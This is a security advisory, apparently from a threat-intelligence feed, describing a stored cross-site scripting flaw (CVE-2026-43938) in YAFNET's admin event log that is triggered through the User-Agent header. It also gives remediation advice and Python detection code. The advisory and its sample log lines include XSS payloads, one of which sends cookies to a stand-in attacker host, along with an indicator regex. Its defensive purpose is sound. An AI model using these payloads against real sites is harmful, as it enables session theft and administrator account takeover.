Threat Feed
critical advisory

YAFNET Unauthenticated Stored XSS via User-Agent Header

YAFNET is vulnerable to an unauthenticated stored (second-order) XSS vulnerability in the admin event log: an attacker-supplied `User-Agent` header is written to the event log when a request errors and is later rendered without output encoding, allowing arbitrary JavaScript to execute in an administrator's session.

YAFNET is vulnerable to a stored (second-order) cross-site scripting (XSS) vulnerability. An unauthenticated attacker can place malicious JavaScript in the User-Agent header of an HTTP request. Whenever that request triggers a server-side error, the header value is serialized into JSON and written to the EventLog.Description column of the database. The admin event log page deserializes that JSON and renders the UserAgent value without HTML encoding, so when an administrator views the event log page, the injected JavaScript executes in the administrator's browser session, potentially leading to account takeover or other malicious activity. This vulnerability affects YAFNET.Core versions 4.0.0-beta01 through 4.0.4 and 3.x versions up to and including 3.2.11. The vulnerability was reported on 2026-05-05 and assigned CVE-2026-43938.

Attack Chain

  1. An unauthenticated attacker sends a malicious HTTP request to the /api/Attachments/GetAttachment endpoint with a crafted User-Agent header containing an XSS payload (e.g., <img src=x onerror=alert('XSS')>).
  2. The YAFNET application encounters an error when processing the request, triggering an exception.
  3. The YAFNET.Core/Logger/DbLogger.cs captures the request’s User-Agent header.
  4. The User-Agent string is serialized into a JSON object using JsonConvert and stored in the EventLog.Description column of the dbo.EventLog table in the database.
  5. An administrator navigates to the /Admin/EventLog page.
  6. The YetAnotherForum.NET/Pages/Admin/EventLog.cshtml.cs deserializes the JSON from the EventLog.Description column.
  7. The FormatStackTrace() function extracts the UserAgent value from the deserialized JSON.
  8. The EventLog.cshtml Razor view uses @Html.Raw to render the UserAgent value directly into the HTML, without proper encoding, resulting in the execution of the attacker-controlled JavaScript in the administrator’s browser.
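The second-order flow in steps 3 to 8, modelled in Python as an added example. This is not YAFNET's code (the real path is C#/Razor and JsonConvert); the functions log_event, format_stack_trace, render_vulnerable, render_fixed and contains_active_markup are this example's own, and the User-Agent value is constructed. It shows the point that matters for the fix: JSON serialization preserves the HTML-significant characters intact, so the only effective control is encoding at the output boundary.

```python
import html
import json

# Constructed header value for the example (not captured from a real system).
MALICIOUS_USER_AGENT = "Mozilla/5.0 <img src=x onerror=alert('XSS')>"


def log_event(user_agent: str, message: str) -> str:
    """Model of the DbLogger step: the request's User-Agent is serialized into a
    JSON document that becomes EventLog.Description. JSON escaping protects the
    JSON structure only; '<', '>' and quotes survive unchanged."""
    return json.dumps({"Message": message, "UserAgent": user_agent})


def format_stack_trace(description: str) -> str:
    """Model of the admin page's read path: parse the stored JSON and return the
    UserAgent value exactly as the client supplied it."""
    return json.loads(description)["UserAgent"]


def render_vulnerable(user_agent_field: str) -> str:
    """@Html.Raw equivalent: the value is concatenated into the markup as-is."""
    return f"<td>{user_agent_field}</td>"


def render_fixed(user_agent_field: str) -> str:
    """Hardened equivalent: HTML-encode at the point of output (what Razor's
    default @value does, or HttpUtility.HtmlEncode in C#)."""
    return f"<td>{html.escape(user_agent_field, quote=True)}</td>"


def contains_active_markup(rendered: str) -> bool:
    """Crude check used only by this example: is there still a raw <img tag
    carrying an event-handler attribute in the rendered HTML?"""
    return "<img" in rendered and "onerror=" in rendered


if __name__ == "__main__":
    stored = log_event(MALICIOUS_USER_AGENT, "Attachment not found")
    print("stored JSON :", stored)          # angle brackets are still present
    ua = format_stack_trace(stored)
    print("raw render  :", render_vulnerable(ua))
    print("fixed render:", render_fixed(ua))
```

Run it and compare the two render lines: the stored JSON already contains the tag verbatim, and only the encoded render turns `<img` into `&lt;img`.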

Impact

A successful XSS attack allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator's session. This can lead to a complete forum takeover, including creating new administrative accounts, modifying site-wide settings, and exfiltrating user data from admin-only endpoints. Exploitation does require an administrator to open the event log page, but because the payload persists in the database, the attacker can plant it and simply wait. The injection step itself needs no credentials, so it is readily exploitable at scale and easy to automate.

Recommendation

  • Apply the patch or upgrade YAFNET.Core to a release later than 4.0.4 (4.x line) or later than 3.2.11 (3.x line) to remediate the XSS vulnerability described in CVE-2026-43938.
  • Deploy the Sigma rule “Detect YAFNET XSS in Event Log” to your SIEM to identify potential exploitation attempts targeting the User-Agent header.
  • Monitor web server logs for requests to /api/Attachments/GetAttachment with suspicious User-Agent headers, particularly those that produced a server error, since only errored requests reach the event log.
  • Until the instance is patched, avoid opening /Admin/EventLog from a privileged session: a payload already stored in dbo.EventLog will execute on every view of the page.
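An added detection example covering both rules listed below; it is not the platform's Sigma logic and not YAFNET code. It parses constructed combined-format web server log lines (sample data, not real traffic), flags requests to /api/Attachments/GetAttachment whose User-Agent contains markup, and pairs each with the next load of /Admin/EventLog, which is the moment a stored payload would fire. The indicator regex, the endpoint constants and the correlation scheme are this example's assumptions.

```python
import re
from datetime import datetime

# nginx/Apache "combined" log format; the User-Agent is the final quoted field.
COMBINED_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that never occur in a real browser User-Agent but do in XSS payloads:
# a tag opener, a javascript: URL, an on*= event handler, or an HTML entity.
# This indicator list is this example's assumption, not the platform's rule logic.
XSS_INDICATORS = re.compile(r"<[a-z!/]|javascript:|\bon[a-z]+\s*=|&#x?[0-9a-f]+;?", re.IGNORECASE)

TARGET_ENDPOINT = "/api/Attachments/GetAttachment"
ADMIN_EVENTLOG = "/Admin/EventLog"

# Constructed sample log lines (not real traffic): a benign request, two
# injection attempts that each produced a server error, and an admin page view.
SAMPLE_LOG = """\
203.0.113.10 - - [05/May/2026:10:01:02 +0000] "GET /api/Attachments/GetAttachment?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0"
203.0.113.77 - - [05/May/2026:10:01:09 +0000] "GET /api/Attachments/GetAttachment?id=999999 HTTP/1.1" 500 0 "-" "<img src=x onerror=alert('XSS')>"
203.0.113.77 - - [05/May/2026:10:01:11 +0000] "GET /api/Attachments/GetAttachment?id=999999 HTTP/1.1" 500 0 "-" "Mozilla/5.0 <svg/onload=fetch('//attacker.example/'+document.cookie)>"
198.51.100.5 - - [05/May/2026:10:30:00 +0000] "GET /Admin/EventLog HTTP/1.1" 200 18231 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/124.0"
"""


def parse_line(line: str):
    """Return a dict of fields for one combined-format line, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string for endpoint matching
    return rec


def find_injection_attempts(log_text: str) -> list:
    """Equivalent of the first rule: requests to the vulnerable endpoint whose
    User-Agent carries markup. Only errored requests reach the event log, so a
    5xx status is recorded with each hit for triage."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] == TARGET_ENDPOINT and XSS_INDICATORS.search(rec["ua"]):
            rec["server_error"] = rec["status"].startswith("5")
            hits.append(rec)
    return hits


def find_eventlog_views(log_text: str) -> list:
    """Equivalent of the second rule: loads of the admin event log page.
    Low value alone; it matters when it follows an injection attempt."""
    return [rec for rec in map(parse_line, log_text.splitlines())
            if rec and rec["path"] == ADMIN_EVENTLOG]


def correlate(log_text: str) -> list:
    """Pair each injection attempt with the first admin event log view after it:
    that view is when the stored payload would execute in the admin's browser."""
    views = sorted(find_eventlog_views(log_text), key=lambda r: r["time"])
    pairs = []
    for hit in find_injection_attempts(log_text):
        later = [v for v in views if v["time"] > hit["time"]]
        if later:
            pairs.append({"attacker_ip": hit["ip"], "payload": hit["ua"],
                          "injected_at": hit["time"], "viewed_at": later[0]["time"],
                          "viewer_ip": later[0]["ip"]})
    return pairs


if __name__ == "__main__":
    for p in correlate(SAMPLE_LOG):
        print(f"{p['injected_at']:%H:%M:%S} {p['attacker_ip']} injected; viewed "
              f"{p['viewed_at']:%H:%M:%S} by {p['viewer_ip']}: {p['payload']}")
```

The indicator set is deliberately narrow: a legitimate browser User-Agent never contains a `<`, so the tag-opener alone is a strong signal, and the pairing with a later event log view is what turns a low-severity page access into an actionable alert.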

Detection coverage (2 rules)

Detect YAFNET XSS in Event Log

critical

Detects attempts to inject XSS payloads via the User-Agent header targeting the YAFNET application which could result in stored XSS.

Sigma rule. Tactics: persistence, privilege_escalation. Techniques: T1068, T1505.003. Sources: webserver, linux.

Detect YAFNET Event Log Access

low

Detects access to the YAFNET admin event log page, which could indicate an administrator viewing a stored XSS payload.

Sigma rule. Tactics: persistence, privilege_escalation. Techniques: T1068, T1505.003. Sources: webserver, linux.

Detection queries are kept inside the platform.